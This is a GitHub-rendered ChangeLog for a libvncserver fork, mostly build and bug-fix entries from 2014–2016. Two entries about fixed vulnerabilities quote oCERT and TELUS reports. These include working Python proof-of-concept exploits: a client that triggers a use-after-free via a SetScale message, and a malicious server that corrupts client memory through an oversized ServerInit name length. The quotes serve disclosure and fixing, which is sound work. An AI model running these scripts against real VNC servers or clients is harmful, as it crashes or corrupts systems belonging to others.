forked from veyon/libvncserver
-
Notifications
You must be signed in to change notification settings - Fork 1
/
ChangeLog
9044 lines (6301 loc) · 349 KB
/
ChangeLog
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
2016-12-29 Christian Beier <[email protected]>
* README: Fix README markdown.
2016-12-28 Christian Beier <[email protected]>
* CMakeLists.txt: CMake: version up as well.
2016-12-28 Christian Beier <[email protected]>
* NEWS: Update NEWS.
2016-12-28 Christian Beier <[email protected]>
* configure.ac: Version up.
2016-12-28 Christian Beier <[email protected]>
* libvncserver/main.c: LibVNCServer: fix starting of an
onHold-client in threaded mode. Discovered by madscientist159 on 11 Jan 2015: "noted in testing with the threaded server build, whereby if
newClientHook() returned RFB_CLIENT_ON_HOLD there was no way to
release the hold when the server became ready"
2016-12-09 Christian Beier <[email protected]>
* : Merge pull request #145 from bkylerussell/websockets Sec-WebSocket-Protocol header fix
2016-12-02 Christian Beier <[email protected]>
* : Merge pull request #142 from samhed/master Write the correct length for end of header
2016-11-29 Christian Beier <[email protected]>
* : Merge pull request #140 from vapier/master test/Makefile: use check_PROGRAMS
2015-01-10 Timothy Pearson <[email protected]>
* README: Update README to reflect change from defaultPtrAddEvent to
rfbDefaultPtrAddEvent
2016-11-25 Christian Beier <[email protected]>
* libvncserver/httpd.c: httpd: rework mime type handling to
recognise more types
2016-11-24 Christian Beier <[email protected]>
* .travis.yml: TravisCI: Another stab at fixing OSX build. See https://github.com/Tarsnap/spiped/pull/92
2016-11-24 Christian Beier <[email protected]>
* configure.ac: Revert "Hopefully fix building on OSX." This reverts commit 584b23fdbe12edd81119d57ddd378d10e52cc9e1.
2016-11-24 Christian Beier <[email protected]>
* configure.ac: Hopefully fix building on OSX.
2016-11-24 Christian Beier <[email protected]>
* .travis.yml: TravisCI: check on OSX as well, test both gcc and
clang.
2016-11-24 Christian Beier <[email protected]>
* libvncclient/rfbproto.c: Fix building on OSX.
2016-11-24 Christian Beier <[email protected]>
* : Merge pull request #137 from atalax/master Fix two heap buffer overflows
2016-11-18 Christian Beier <[email protected]>
* : Merge pull request #138 from stweil/master Fix some typos
2016-11-18 Stefan Weil <[email protected]>
* README, common/zywrletemplate.c, examples/example.c,
examples/zippy.c: Fix some typos (it's / its) Signed-off-by: Stefan Weil <[email protected]>
2016-11-14 Josef Gajdusek <[email protected]>
* libvncclient/ultra.c: Fix heap overflow in the ultra.c decoder The Ultra type tile decoder does not use the _safe variant of the
LZO decompress function, which allows a maliciuous server to
overwrite parts of the heap by sending a larger-than-specified LZO
data stream.
2016-11-14 Josef Gajdusek <[email protected]>
* libvncclient/rfbproto.c: Fix heap overflows in the various
rectangle fill functions Altough rfbproto.c does check whether the overall FramebufferUpdate
rectangle is too large, some of the individual encoding decoders do
not, which allows a malicious server to overwrite parts of the heap.
2016-09-24 Christian Beier <[email protected]>
* : Merge pull request #129 from bkylerussell/systemd Support systemd socket activation
2016-08-14 Zac Medico <[email protected]>
* libvncserver/sockets.c: Support autoPort with ipv4 or ipv6
disabled Make it possible to get autoPort behavior with either ipv4 or ipv6
disabled, by setting rfbScreen->ipv6port or rfbScreen->port to a
negative number. This will make it possible for x11vnc to enforce
its -noipv6 option, as discussed in the following bug report: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=672449
2016-06-05 Christian Beier <[email protected]>
* NEWS: Update NEWS.
2016-06-05 Christian Beier <[email protected]>
* rfb/rfbclient.h: Fix rfbClientSwap64IfLE broken in
fe7df89fb1777b4fd303d5a601541f6062caf8ea
2016-06-05 Christian Beier <[email protected]>
* : Merge pull request #84 from plettix/master fix for issue 81
2016-05-30 Christian Beier <[email protected]>
* CMakeLists.txt: CMake: Add maybe-found OpenSSL libs to
libvncclient.
2016-05-30 Christian Beier <[email protected]>
* CMakeLists.txt: CMake: Not all platforms have endian.h, so use the
build system's endianess check.
2016-05-30 Christian Beier <[email protected]>
* rfb/rfbproto.h: Only include endian.h if present on system.
2016-05-30 Christian Beier <[email protected]>
* : Merge pull request #105 from cgeorges82/master fix for issue #97. Also, this fixes cmake builds for other
platforms.
2016-05-13 George Fleury <[email protected]>
* libvncserver/sockets.c: Avoid calling SSL_pending when connection
is already closed Avoid calling SSL_pending when connection is already closed, calling
SSL_pending with connection already closed is crashing. To
reproduce, open a secure websocket binay protocol connection with
libvncserver compiled with OpenSSL, and when libvncserver is waiting
for rfbProcessClientProtocolVersion send any invalid char, it will
fail and call rfbCloseClient whith destroy all SSL context, calling
SSL_pending after that will generate a invalid access.
2016-04-24 Christian Beier <[email protected]>
* : Merge pull request #103 from rdieter/master use namespaced vnc_max macro (issue #102)
2016-04-23 gbdj <[email protected]>
* libvncclient/tls_gnutls.c, libvncclient/vncviewer.c,
rfb/rfbclient.h: libvncclient/tls_gnutls.c: Add hooks to
WriteToTLS() for optional protection by mutex. Fix upstream issue
#100 Squashed commit of the pull request #101 : commit
1c7e01e81862bc46508e675e83c74cc6d63224b0 commit
1e749b094d6696380d3f0540a00138d7e3427874
2016-02-18 Rex Dieter <[email protected]>
* libvncclient/listen.c, libvncserver/httpd.c,
libvncserver/rfbserver.c, libvncserver/sockets.c, rfb/rfbproto.h:
use namespaced rfbMax macro (issue #102) Not using generic 'max', avoids conflicts with stl_algobase.h
2016-04-15 Christian Beier <[email protected]>
* : Merge pull request #115 from solofox/master Enable AF_UNIX socket: ignore setsockopt TCP_NODELAY failure.
2016-04-13 Christian Beier <[email protected]>
* : Merge pull request #114 from zbierak/master Increase MAX_ENCODINGS value to accommodate more client encodings
2016-04-12 Christian Beier <[email protected]>
* : Merge pull request #110 from AlexejStukov/patch-1 break statement out of case
2016-04-12 zbierak <[email protected]>
* libvncclient/rfbproto.c: Fix buffer overflow when applying client
encodings
2016-04-12 Christian Beier <[email protected]>
* travis.yml: TravisCI: remove old config.
2016-04-12 Christian Beier <[email protected]>
* .travis.yml: TravisCI: add autoreconf step.
2016-04-12 Christian Beier <[email protected]>
* .travis.yml: TravisCI: the config starts with a dot!
2016-04-12 Christian Beier <[email protected]>
* README, README.md: Add a README.md and and Travis CI status badge.
2016-04-12 Christian Beier <[email protected]>
* travis.yml: Add a minimalistic config for Travis CI.
2016-04-08 Christian Beier <[email protected]>
* : Merge pull request #109 from zbierak/master Fix memory access error in camera.c example
2016-04-04 zbierak <[email protected]>
* examples/camera.c: Fix memory access error in camera.c example
2016-03-05 Cédric Georges <[email protected]>
* CMakeLists.txt, libvncclient/tls_gnutls.c: Append missing include
directory for GNUTLS and OPENSSL in CMake project Append support of
gnutls > v 2.99.01 (gnutls_transport_set_global_errno have a
different signature)
2016-03-05 Cédric Georges <[email protected]>
* CMakeLists.txt: re-up comment
2016-03-05 Cédric Georges <[email protected]>
* CMakeLists.txt, rfb/rfbconfig.h.cmake: Append IPv6 option in CMake
Project
2016-01-27 Christian Beier <[email protected]>
* : Merge pull request #99 from spaceone/master Ignore null pointers in FillRectangle() and
CopyRectangleFromRectangle()
2016-01-27 SpaceOne <[email protected]>
* libvncclient/rfbproto.c: Ignore null pointers in FillRectangle()
and CopyRectangleFromRectangle()
2015-12-03 Christian Beier <[email protected]>
* rfb/rfbclient.h: Be a bit clearer with the cursorshape
documentation for libvncclient.
2015-12-03 Christian Beier <[email protected]>
* libvncclient/cursor.c, rfb/rfbclient.h: Properly document
HandleCursorShape and GotCursorShapeProc.
2015-10-10 Christian Beier <[email protected]>
* : Merge pull request #90 from stweil/fix Fix some recently introduced regressions
2015-10-10 Stefan Weil <[email protected]>
* rfb/rfbproto.h: Fix definition of POSIX data types Commit 92f558482d94c5152174a1983a40863bd6b07911 added stdint.h to
get the type definitions, but included it after the first use of
int8_t in builds for Windows. Signed-off-by: Stefan Weil <[email protected]>
2015-10-10 Stefan Weil <[email protected]>
* rfb/rfbproto.h: Fix endianness detection Commit 97f442ef2aa65ade6bea11e90054c57b90abbaca tried to improve the
endianness detection, but introduced a typo and problems for Windows
builds (no endian.h, different definition of
LIBVNCSERVER_WORDS_BIGENDIAN). Fix both issues. Signed-off-by: Stefan Weil <[email protected]>
2015-10-09 Stefan Weil <[email protected]>
* ChangeLog, Doxyfile, NEWS, README, client_examples/vnc2mpg.c,
common/zywrletemplate.c, examples/camera.c, libvncclient/listen.c,
libvncclient/sockets.c, libvncserver/cargs.c, libvncserver/scale.c,
libvncserver/sockets.c, libvncserver/tight.c,
libvncserver/tightvnc-filetransfer/filetransfermsg.c,
libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c,
libvncserver/tightvnc-filetransfer/rfbtightproto.h,
libvncserver/tightvnc-filetransfer/rfbtightserver.c,
libvncserver/ultra.c, libvncserver/zlib.c, rfb/keysym.h, rfb/rfb.h,
rfb/rfbproto.h, webclients/java-applet/ssl/README,
webclients/java-applet/ssl/proxy.vnc,
webclients/java-applet/ssl/ss_vncviewer,
webclients/java-applet/ssl/ultravnc-102-JavaViewer-ssl-etc.patch,
webclients/novnc/include/display.js,
webclients/novnc/include/rfb.js, webclients/novnc/include/ui.js: Fix
some typos (found by codespell) Signed-off-by: Stefan Weil <[email protected]>
2015-07-22 plettix <[email protected]>
* common/md5.c: another shift fix
2015-07-22 plettix <[email protected]>
* rfb/rfb.h, rfb/rfbclient.h: shift fixes - if an integer is a
negative number then the return value of "Swap32IfLE" was -1
2015-07-07 plettix <[email protected]>
* libvncserver/websockets.c: fix for issue 81 use different buffers
for decode and encode
2015-05-28 Christian Beier <[email protected]>
* CMakeLists.txt, configure.ac, rfb/rfbproto.h: Instead of letting
the build system define endianess, rely on endian.h.
2015-05-28 Christian Beier <[email protected]>
* .gitignore, CMakeLists.txt, Doxyfile, Makefile.am, configure.ac,
libvncserver/Makefile.am, m4/ax_create_stdint_h.m4, rfb/rfbproto.h:
Do away with rfbint.h generation and use stdint.h directly instead.
2015-04-17 Christian Beier <[email protected]>
* libvncclient/rfbproto.c, libvncclient/vncviewer.c: Re-add the
useful bits of 9aa9ac59b4cb10bfca93456a3098e348de172d7f.
2015-04-17 Christian Beier <[email protected]>
* libvncclient/Makefile.am: Revert "Add libvncclient/h264.c to dist
tarball." This reverts commit 9aa9ac59b4cb10bfca93456a3098e348de172d7f.
2015-04-17 Christian Beier <[email protected]>
* client_examples/gtkvncviewer.c, configure.ac,
libvncclient/Makefile.am, libvncclient/h264.c,
libvncclient/rfbproto.c, libvncclient/vncviewer.c, rfb/rfbproto.h:
Revert "LibVNCClient: Add H.264 encoding for framebuffer updates" This reverts commit d891478ec985660c03f95cffda0e6a1ad4ba350c. Conflicts: configure.ac libvncclient/h264.c
2015-04-17 Christian Beier <[email protected]>
* : Merge pull request #70 from maxnet/master httpd: disallow directory traversal
2015-04-17 Christian Beier <[email protected]>
* : Merge pull request #72 from lopago/fix-segfaults prevent segfaults due to uninitialized memory
2015-04-15 Thomas Anderson <[email protected]>
* configure.ac: configure.ac: Use AC_CHECK_TOOL for cross-compiling
support. When cross-compiling the ar program has the appropriate prefix
prepended. Respect that here and have autotools autodetect the
appropriate tool.
2015-04-13 Benjamin Dürholt <[email protected]>
* libvncserver/rfbssl_gnutls.c, libvncserver/tight.c: Changed C++
style comments to C ones
2015-04-10 Benjamin Dürholt <[email protected]>
* libvncserver/rfbssl_gnutls.c, libvncserver/tight.c: prevent
segfault
2015-03-29 Floris Bos <[email protected]>
* libvncserver/httpd.c: httpd: disallow directory traversal Signed-off-by: Floris Bos <[email protected]>
2015-03-27 Jay Carlson <[email protected]>
* libvncclient/rfbproto.c: Avoid divide-by-zero in raw encoding (OSX
RealVNC) OS X RealVNC server crashes out Remmina because the server can
provoke bytesPerLine to be zero. Assume this is coding for zero
lines. The condition could be checked before the calculation of
bytesPerLine. I donât understand the preconditions of this code
to say one way or the other.
2015-02-09 Peter Spiess-Knafl <[email protected]>
* libvncclient/Makefile.am, libvncserver/Makefile.am: Set autotools
SOVERSION.
2015-02-05 Christian Beier <[email protected]>
* : Merge pull request #63 from LibVNC/sha1rework Replace SHA1 implementation with the one from RFC 6234.
2015-01-27 Christian Beier <[email protected]>
* : Merge pull request #60 from cinemast/master fixing SOVERSION and .so VERSION
2015-01-18 Christian Beier <[email protected]>
* webclients/index.vnc: Update link to project home page in
index.vnc.
2015-01-18 Christian Beier <[email protected]>
* : Merge pull request #57 from maxnet/master Fix handling of multiple VNC commands per websockets frame
2015-01-16 Christian Beier <[email protected]>
* : Merge pull request #56 from maxnet/master Only advertise xvp support when xvpHook is set
2015-01-06 Christian Beier <[email protected]>
* AUTHORS: Add Floris to AUTHORS.
2015-01-06 Christian Beier <[email protected]>
* NEWS: Update NEWS.
2015-01-02 Christian Beier <[email protected]>
* : Merge pull request #51 from maxnet/master Initialize libgcrypt before use
2015-01-02 Christian Beier <[email protected]>
* : Merge pull request #50 from maxnet/master tls_openssl.c: define _XOPEN_SOURCE for extra POSIX functionality
2014-12-30 Christian Beier <[email protected]>
* libvncclient/sockets.c: Fix another MinGW64 build issue.
WSAEWOULDBLOCK is not MinGW-specific.
2014-12-30 Christian Beier <[email protected]>
* libvncserver/rfbserver.c: Fix building with mingw-w64.
2014-12-30 Christian Beier <[email protected]>
* configure.ac: confgure.ac: Remove MinGW linker flag that's
incompatible with mingw-w64.
2014-12-30 Christian Beier <[email protected]>
* autogen.sh: autogen.sh: pass cmdline params to configure call.
2014-12-29 Christian Beier <[email protected]>
* : Merge pull request #49 from maxnet/master Fix libva related compile errors
2014-12-29 Floris Bos <[email protected]>
* configure.ac, libvncclient/h264.c: Fix libva related compile
errors - Make h264.c compile with recent libva version by including
va_compat.h - Only enable libva if libva-x11 is installed - Modified configure help text Previous help text suggested libva was only build when
--with-libva was specified, while actual behavior is to build it
by default. Warning: THIS CODE IS UNTESTED. Lacking a h.264 capable VNC server
Also no attempt is made to support platforms not using X11 Signed-off-by: Floris Bos <[email protected]>
2014-10-31 Christian Beier <[email protected]>
* README: Add VNCpp to projects using LibVNC.
2014-10-21 Christian Beier <[email protected]>
* ChangeLog: Update ChangeLog for 0.9.10.
2014-10-21 Christian Beier <[email protected]>
* NEWS: Update NEWS.
2014-10-21 Christian Beier <[email protected]>
* libvncserver/sockets.c: Update comments regarding
rfbClientConnectionGone().
2014-10-21 Christian Beier <[email protected]>
* libvncserver/scale.c: Fix Use-After-Free vulnerability in
LibVNCServer wrt scaling. Reported by Ken Johnson <[email protected]>. The vulnerability would occur in both the rfbPalmVNCSetScaleFactor
and rfbSetScale cases in the rfbProcessClientNormalMessage function
of rfbserver.c. Sending a valid scaling factor is required
(non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not
accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg,
sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n",
msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale,
cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger
a free. return; at the end, both cases there is a call the rfbSendNewScaleSize
function, where if the connection is subsequently disconnected after
sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth =
Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth
= Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response
to a UltraVNC style frameuffer resize event (%dx%d)\n",
cl->scaledScreen->width, cl->scaledScreen->height); if
(rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) {
rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead
to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is
called again on the return from rfbProcessClientNormalMessage. In
KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not
require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP =
[self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))]PASSWORD =
(struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7]))crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py <host> <port>
[password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap---
2014-10-14 dscho <[email protected]>
* : Merge pull request #43 from maksqwe/fix_rfbSelectBox Fix selData.buttonWidth calculation
2014-10-10 Christian Beier <[email protected]>
* libvncclient/rfbproto.c: Fix possible libvncclient ServerInit
memory corruption. This fixes the following oCERT report (oCERT-2014-008 pt.2): There is a similar vulnerability to the previous one I sent. This is
related to the ServerInit message where the width, the height of the
server's framebuffer, its pixel format, and the name are sent to the
client. The name can be used in a malicious manner to trigger a
memory corruption in the client. Field Size --------------------------------- name-length
[4] name-string [name-length] Below you will find a PoC script to show the vulnerability. This was
tested on Fedora 20 with the latest version of krdc. I have noticed something, where the memory corruption causes the
program to hang but allows you to try to disconnect. After this it
hangs. Occasionally there will be segmentation fault in memcpy. This
can become more reliable if you connect to a different VNC server
first (Or the wrong port on the malicious server) then connecting to
the malicious port. Every time I accidentally made the wrong VNC
connection attempt the next time I connected it segfault'd. Just run the script it will listen on port 5900 and connect to it
with krdc for example. I have observed Remmina crash more reliably. import socket,struct,sys HOST = "" PORT = 5900 c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.bind((HOST,PORT)) c.listen(1) conn,addr = c.accept() print "Connected by ", addr protocolVersion3008 =
"\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a"
conn.send(protocolVersion3008) data = conn.recv(1024) # Receive the version from them. secTypeNone = "\x01\x01" secTypeAuth = "\x01\x02"
conn.send(secTypeNone) data = conn.recv(1024) # Receive the secType choice from them. secResultOk = "\x00" * 4 secResultNo = "\x00\x00\x00\x01"
conn.send(secResultOk) data = conn.recv(1024) # Receive the ClientInit (Shared-flag). frameBufferWidth = 0x0480 frameBufferHeight = 0x0360 bitsPerPixel =
0x20 depth = 0x18 bigEndian = 0x1 trueColor = 0x0 redM = 0x0 greenM
= 0x0 blueM = 0x0 redS = 0x0 greenS = 0x0 blueS = 0x0 padding =
"\x00\x00\x00" nameLength = 0xffffffff nameString = "AA" * 0xFFFF +
"\x00\x0a" conn.send( struct.pack(">HHBBBBHHHBBB",frameBufferWidth,
frameBufferHeight, bitsPerPixel, depth, bigEndian, trueColor, redM,
greenM, blueM, redS, greenS, blueS) + padding + struct.pack(">I",
nameLength) + nameString ) c.close()
2014-10-10 Christian Beier <[email protected]>
* libvncclient/sockets.c: Fix potential memory corruption in
libvncclient. Fixes (maybe amongst others) the following oCERT report
([oCERT-2014-008]): LibVNCServer HandleRFBServerMessage rfbServerCutText malicious
msg.sct.length It looks like there may be a chance for potential memory corruption
when a LibVNCServer client attempts to process a Server Cut Text
message. case rfbServerCutText: { char *buffer; if (!ReadFromRFBServer(client, ((char *)&msg) + 1, sz_rfbServerCutTextMsg - 1)) return FALSE; msg.sct.length = rfbClientSwap32IfLE(msg.sct.length); <<
Retrieve malicious length buffer = malloc(msg.sct.length+1); << Allocate buffer. Can
return 0x0 if (!ReadFromRFBServer(client, buffer, msg.sct.length)) <<
Attempt to write to buffer return FALSE; buffer[msg.sct.length] = 0; << Attempt to write to buffer if (client->GotXCutText) client->GotXCutText(client, buffer, msg.sct.length); <<
Attempt to write to buffer free(buffer); break; } If a message is provided with an extremely large size it is possible
to cause the malloc to fail, further leading to an attempt to write
0x0.
2014-10-09 Christian Beier <[email protected]>
* NEWS: Update NEWS for 0.9.10.
2014-10-09 Christian Beier <[email protected]>
* AUTHORS: Update AUTHORS.
2014-10-07 dscho <[email protected]>
* : Merge pull request #42 from LibVNC/autotools-fix-revisited Add autoconf macros that might not be installed with a usual
autotools setup
2014-10-07 Johannes Schindelin <[email protected]>
* autogen.sh: Add back a working autogen.sh There was no reason to get rid of the convenient script. Most
developers who are not in love with autoconf fail to remember that
autoreconf invocation, therefore it is better to have something
working in place. Signed-off-by: Johannes Schindelin <[email protected]>
2014-09-01 Nicolas Ruff <[email protected]>
* libvncserver/rfbserver.c: Fix stack-based buffer overflow There was a possible buffer overflow in rfbFileTransferOffer message
when processing the FileTime. Signed-off-by: Johannes Schindelin <[email protected]>
2014-10-07 dscho <[email protected]>
* : Merge pull request #41 from newsoft/master Fixing 2 security issues
2014-10-06 newsoft <[email protected]>
* libvncserver/scale.c: Make sure that no integer overflow could
occur during scaling
2014-10-06 Christian Beier <[email protected]>
* libvncclient/Makefile.am: Add libvncclient/h264.c to dist tarball. Otherwise the sources from a 'make dist' package wouldn't compile.
2014-10-03 Christian Beier <[email protected]>
* m4/.gitignore: Really add empty m4 subdirectory. This change kinda got lost with the last commit re-splitting.
2014-10-02 Christian Beier <[email protected]>
* : Merge pull request #38 from LibVNC/autotools-fix-revisited Autotools fix revisited.
2014-10-02 Christian Beier <[email protected]>
* webclients/novnc/LICENSE.txt, webclients/novnc/README.md,
webclients/novnc/include/base.css,
webclients/novnc/include/base64.js,
webclients/novnc/include/black.css,
webclients/novnc/include/blue.css,
webclients/novnc/include/chrome-app/tcp-client.js,
webclients/novnc/include/des.js,
webclients/novnc/include/display.js,
webclients/novnc/include/input.js,
webclients/novnc/include/jsunzip.js,
webclients/novnc/include/keyboard.js,
webclients/novnc/include/keysym.js,
webclients/novnc/include/keysymdef.js,
webclients/novnc/include/playback.js,
webclients/novnc/include/rfb.js, webclients/novnc/include/ui.js,
webclients/novnc/include/util.js,
webclients/novnc/include/web-socket-js/web_socket.js,
webclients/novnc/include/websock.js,
webclients/novnc/include/webutil.js, webclients/novnc/vnc.html,
webclients/novnc/vnc_auto.html: Update noVNC HTML5 client to latest
version from https://github.com/kanaka/noVNC.
2014-09-21 Brian Bidulock <[email protected]>
* .gitignore: add a few more ignores
2014-09-21 Brian Bidulock <[email protected]>
* autogen.sh: removed autogen.sh - no longer applicable: use autoreconf -fiv
2014-10-02 Christian Beier <[email protected]>
* INSTALL, acinclude.m4, ltmain.sh: Remove autotools-related files
that will get installed by autoreconf -i.
2014-10-02 Brian Bidulock <[email protected]>
* Makefile.am, configure.ac: Use an m4 script subdirectory, fix
automake init and two macro names.
2014-10-02 Brian Bidulock <[email protected]>
* client_examples/Makefile.am, examples/Makefile.am,
examples/android/Makefile.am, libvncclient/Makefile.am,
libvncserver/Makefile.am, test/Makefile.am: Rename obsolete INCLUDES
to AM_CPPFLAGS
2014-09-30 Johannes Schindelin <[email protected]>
* libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c:
Close unclosed comments ;-) Signed-off-by: Johannes Schindelin <[email protected]>
2014-09-30 dscho <[email protected]>
* : Merge pull request #36 from danielgindi/master A forgotten `#ifdef WIN32` broke UNIX build.
2014-09-30 dscho <[email protected]>
* : Merge pull request #33 from danielgindi/master More MSVC adjustments, now focuses on the libvncserver
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/tightvnc-filetransfer/handlefiletransferrequest.c:
These are UNIX headers, and are not available on MSVC
2014-09-20 Daniel Cohen Gindi <[email protected]>
* rfb/rfb.h: Those are generally the windows headers, not just MinGW
2014-09-20 Daniel Cohen Gindi <[email protected]>
* libvncserver/rfbserver.c: On windows, use the Win32 calls for
directory enumerations. We also do not need the conversion between UNIX values to Windows
values in the RTF_FIND_DATA struct, as we already are on windows.
2014-09-20 Daniel Cohen Gindi <[email protected]>
